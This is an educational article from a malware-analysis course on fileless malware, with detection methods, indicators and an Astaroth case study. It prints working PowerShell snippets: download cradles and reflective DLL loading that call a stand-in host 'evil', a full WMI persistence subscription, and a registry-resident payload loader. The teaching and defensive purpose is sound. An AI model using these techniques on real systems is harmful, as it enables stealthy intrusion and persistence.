EpochZero Learn
EpochZero LearnMulti-Domain Tech Learning Hub
Courses
LeaderboardAbout
Dashboard
EpochZero
EpochZero Learn
Multi-Domain Tech Learning Hub

Structured learning for Reverse Engineering, Cloud Security, Cryptography, and Web Development. Articles, videos, tests, and peer discussion.

Learn

  • Learning Path
  • All Articles
  • Video Lessons
  • Podcast
  • eBooks & PDFs
  • Question Banks
  • Cheatsheets
  • MCQ Banks

Tests & Forum

  • All Tests
  • REMA Tests
  • Cloud Tests
  • Forum
  • REMA Forum
  • Cloud Forum
  • Crypto Forum
  • Web Dev Forum

Campus

  • REMA Club
  • Full Stack Dev Club
  • Extension Activity
  • Events
  • CTF Competitions
  • Workshops
  • Industrial Visits

Platform

  • Dashboard
  • Leaderboard
  • About
  • Verify Certificate

© 2026 EpochZero Learn. Educational content for learning purposes.

Course Instructor: Ashish Revar

All articles
Educationfilelesswmipowershell

Fileless and Multi-Technology Malware

How fileless malware executes entirely in memory using PowerShell download cradles, .NET reflection, WMI event subscriptions, and registry-resident payloads — with detection strategies and multi-technology attack chain analysis.

Ashish Revar12 May 202616 min read3 views

Sign in to mark this article as read and track your progress.

Related to this topic

Continue learning

Listen

Spotting Forensic Gold in Malware Strings

Discover how malware analysts extract hidden intelligence from embedded strings — URLs, registry paths, API call sequences, and C2 artefacts that reveal attacker behaviour and seed your IOC list.

Reference material

eBook
REMA eBook 2026
v1.0
Open resource
Cheatsheet
REMA Cheatsheet 2026
v1.0
Open resource
MCQ Bank
REMA MCQ Bank 2026
v1.0
Open resource
Question Bank
REMA Question Bank 2026
v1.0
Open resource

External references

MITRE ATT&CK — Windows Management Instrumentation (T1047)

ATT&CK entry for WMI abuse including event subscription persistence with real-world examples.

reference
Sysmon Configuration — SwiftOnSecurity

Production-ready Sysmon configuration covering WMI activity (Events 19/20/21), process creation, and network connections.

tool
More articlesTest your knowledge

What is Fileless Malware?

Fileless malware executes entirely in volatile memory, leveraging legitimate system tools (LOLBins) and scripting engines rather than dropping traditional executable files. It leaves minimal forensic artefacts on disk, persisting through registry entries, WMI subscriptions, or scheduled tasks that reload the payload into memory after reboot.

Think of fileless malware as a burglar who never brings tools. He uses your own kitchen knife, your own ladder, your own rope. When police search for "burglar tools" they find nothing suspicious. Everything used was already in your house.

Four Fileless Execution Techniques

1. PowerShell Download Cradle

The most common fileless technique. Downloads and executes a script entirely in memory — no file touches disk.

IEX (New-Object Net.WebClient).DownloadString("http://evil/stager.ps1")

The downloaded script runs directly in the PowerShell interpreter. Nothing is written to the filesystem. After execution, the script exists only in RAM and disappears on reboot unless a persistence mechanism is installed.

2. .NET Reflection Loading

Loads a compiled .NET assembly directly from a byte array in memory:

$bytes = (New-Object Net.WebClient).DownloadData("http://evil/payload.dll")
[Reflection.Assembly]::Load($bytes)

The DLL goes from network packet to memory to execution. It never exists as a file on disk. Traditional AV file scanning cannot detect it.

3. WMI Event Subscription Persistence

Creates persistent execution without any traditional autorun entry. Three WMI objects are created:

# Filter: trigger condition
$filter = Set-WmiInstance -Namespace root\subscription -Class __EventFilter
  -Arguments @{Name="PersistFilter";
               EventNamespace="root\cimv2";
               QueryLanguage="WQL";
               Query="SELECT * FROM __InstanceModificationEvent WITHIN 60
                      WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'
                      AND TargetInstance.SystemUpTime >= 120"}

# Consumer: what to do when triggered
$consumer = Set-WmiInstance -Namespace root\subscription -Class CommandLineEventConsumer
  -Arguments @{Name="PersistConsumer";
               CommandLineTemplate="powershell.exe -enc [payload]"}

# Binding: links filter to consumer
$binding = Set-WmiInstance -Namespace root\subscription -Class __FilterToConsumerBinding
  -Arguments @{Filter=$filter; Consumer=$consumer}

Survives reboots. No file in Run key, no entry in Startup folder, no scheduled task visible to basic tools.

Detection: Autoruns (Sysinternals) — check the WMI tab. Volatility printkey and cmdline plugins. Sysmon Event ID 19/20/21 (WMI activity).

4. Registry-Resident Payload

The encoded payload is stored in a registry value. A tiny loader (in a Run key) reads, decodes, and executes it in memory:

# Loader stored in Run key (tiny, hard to detect):
$payload = (Get-ItemProperty HKCU:\Software\Classes\ms-settings).Icon
IEX([System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($payload)))

The Run key entry looks like a short, innocuous PowerShell command. The actual payload is hidden in an unrelated-looking registry value.

Detection: Procmon filter RegQueryValue → look for PowerShell reading unusual registry keys. Large registry values (>1KB of Base64) in unexpected locations.

Multi-Technology Attack Chains

Modern attacks chain multiple technologies. No single tool analyses the complete chain.

VBA Macro         →  PowerShell          →  .NET DLL         →  Shellcode
(Word document)      (downloads/executes)   (.NET reflection)   (process injection)

Analysis tool:       Event ID 4104          dnSpy               x64dbg
  olevba               (Script Block Log)

Each stage requires a different analysis tool. Missing any stage leaves gaps in understanding the full attack.

Detection Strategy: What to Capture

Evidence SourceWhat It Shows
PowerShell Script Block Log (Event 4104)Decoded script content even when obfuscated
Sysmon Event ID 1Process creation with full command-line arguments
Sysmon Event ID 19/20/21WMI filter, consumer, and binding creation
Autoruns — WMI tabPersistent WMI subscriptions
Volatility malfindMemory-resident injected code
Volatility cmdlineCommand line of every process at time of capture
FakeNet-NGNetwork connections made by fileless payload

Key Indicators

powershell.exe spawned by:
  winword.exe     → macro-to-PowerShell chain
  WmiPrvSE.exe    → WMI consumer executing payload
  svchost.exe     → service-based execution

PowerShell command line contains:
  -enc            → encoded payload
  IEX             → in-memory execution
  DownloadString  → download cradle
  [Reflection.Assembly]::Load  → .NET reflection

Registry contains:
  Large Base64 values (>500 chars) in unusual keys
  PowerShell commands as registry values

Memory shows:
  RWX regions outside mapped modules → injected payload
  MZ headers in allocated (not mapped) memory → reflective DLL

Astaroth Case Study

Astaroth is a documented fileless malware family that demonstrates the full chain:

  1. Delivery: spear-phishing email with .lnk shortcut
  2. Initial execution: shortcut runs wscript.exe with a JScript payload
  3. Stage 2: JScript uses bitsadmin.exe (LOLBin) to download encrypted components
  4. Stage 3: extrac32.exe (LOLBin) decodes the encrypted download
  5. Execution: regsvr32.exe loads a scriptlet that reflectively loads the Astaroth DLL into memory
  6. Persistence: WMI event subscription restores the chain on reboot

No traditional PE executable ever touches disk as a standalone file. Each stage uses a different trusted system binary.